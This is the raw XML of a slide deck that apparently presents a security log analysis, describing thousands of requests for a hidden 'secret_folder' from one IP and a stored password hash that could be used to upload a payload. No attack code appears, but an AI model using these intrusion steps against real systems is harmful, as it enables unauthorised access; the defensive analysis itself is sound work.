          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3034003" y="3099188"/>
            <a:ext cx="1909057" cy="1938559"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54FA489F-24DE-400D-A832-41B50EDA3923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136653" y="3099188"/>
            <a:ext cx="1900910" cy="1858012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D38B1E-CF4C-497D-8423-285035676798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6432109" y="108448"/>
            <a:ext cx="704544" cy="533700"/>
            <a:chOff x="2418545" y="694486"/>
            <a:chExt cx="695400" cy="749477"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="3D85C6"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Google Shape;1035;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3136328-3200-4C42-9908-9CB34BE2D006}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2418545" y="694486"/>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mn-lt"/>
                  <a:ea typeface="Roboto Thin"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Google Shape;1036;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25079AE0-FCA9-48B3-ABBB-84F8424612A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2596082" y="1255338"/>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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p66"/>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n-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175987" y="596244"/>
            <a:ext cx="4614677" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The attack started around 15:00 UTC (11:00 am EDT) with 16,178 requests were made for the “secret_folder”. The IP address the requests were coming from 192.168.1.90.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275979" y="669524"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FCE41E4-E8FC-4E2F-B8EA-C96057EF00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 name="Picture 9" descr="A picture containing chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F635E8DD-B67D-4C93-A716-CC219B2A0FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="128810" y="1465107"/>
            <a:ext cx="5255834" cy="2384100"/>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F096FC81-CC58-4446-9F80-FB695D7CD772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3313043" y="3104806"/>
            <a:ext cx="5463607" cy="1782647"/>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C36E147F-C184-446D-9622-C0A0582FEDE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5384644" y="1462414"/>
            <a:ext cx="3392006" cy="1648195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Google Shape;1174;p66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D1294DE-9CF4-450C-9854-C9D644BA98B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4790664" y="666831"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Google Shape;1173;p66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8453D97D-F904-4D0D-B3F4-F590346E6492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4790663" y="593551"/>
            <a:ext cx="4300327" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="45720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320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The “secret_folder” contained a hash password for the employee’s credentials (Ryan), which can be used for uploading  a payload, thus exploiting other vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0FB0A50-9B9E-4849-AB87-E26C3E00EEBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700680" y="3952830"/>
            <a:ext cx="3184233" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>It contained a folder called “connect_to_corp_server” which was accessed 4 times.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"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6626"/>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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1028" name="Google Shape;1028;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285126" y="1057521"/>
            <a:ext cx="670897" cy="423104"/>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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD214156-03FC-4FD5-81BE-2396B292C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33" name="Google Shape;1043;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A84FF00-4FA2-43A9-8867-702F9675E0FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073426" y="1060468"/>
            <a:ext cx="7907704" cy="423104"/>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8" name="Google Shape;1028;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46550883-E746-462E-AD4E-BB89124912F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="290403" y="1590675"/>
            <a:ext cx="670897" cy="423104"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="CC0000"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Google Shape;1029;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B4276AC-DB63-4AC3-B7FB-8F1DA9C61579}"/>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solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="STFangsong" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="STFangsong" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Google Shape;1030;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE107BC-9DAC-48A2-9B60-2ACDA9E5B0D6}"/>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43" name="Google Shape;1028;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55BE83E3-3A18-45D2-AECD-97333D65201A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285126" y="2109999"/>
            <a:ext cx="670897" cy="423104"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="3D85C6"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Google Shape;1029;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B818D17-E3C3-47CD-86E8-8FE21E1959B1}"/>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solidFill>
                  <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Google Shape;1030;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AEF92CA-8E65-4632-90CC-D3C36C0238C7}"/>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 name="Google Shape;1028;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C0DDA80-4B44-4A31-A5D0-45DA90A76959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="290403" y="2646732"/>
            <a:ext cx="670897" cy="423104"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Google Shape;1029;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EEFFA10-6392-46B2-8FDB-0EBDA75CFC5F}"/>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solidFill>
                  <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Google Shape;1030;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FA1482-AD64-455F-8EA7-8EA644445FDD}"/>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49" name="Google Shape;1028;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999E45D2-00B5-4734-BA65-AC83D8F5D0D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285126" y="3168120"/>
            <a:ext cx="670897" cy="423104"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Google Shape;1029;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59BEBFFF-3F65-4131-87B9-81C50EE105E3}"/>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bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Google Shape;1030;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5715D6-6A4B-4987-8909-B321FF8E0344}"/>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 name="Google Shape;1028;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16617F5F-0226-479C-B895-B4ACAA734A23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285126" y="4216592"/>
            <a:ext cx="670897" cy="423104"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Google Shape;1029;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55AC406-F954-403D-8EC7-008276C66CCC}"/>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bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>R</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Google Shape;1030;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8FE8AAC-70DE-43B2-BCF8-4268A8625C73}"/>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 name="Google Shape;1028;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EE28C46-394C-46E7-A21A-DE84CBE0E8F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="292719" y="3705671"/>
            <a:ext cx="670897" cy="423104"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Google Shape;1029;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6243F96A-437E-485B-B3E3-7EA0FD8FD86A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="round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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>AS</a:t>
              </a:r>
              <a:endParaRPr sz="2200" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Google Shape;1030;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD2600C-D220-40B4-B6A8-DBF55B497AF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtra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 name="Google Shape;1043;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49858F79-D645-4018-84BA-978346861418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073426" y="1585328"/>
            <a:ext cx="7907704" cy="423104"/>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043;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7EA252D-FDFB-49B7-9088-6FECCC72851B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073426" y="2109999"/>
            <a:ext cx="7907704" cy="423104"/>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043;p55">
            <a:extLst>
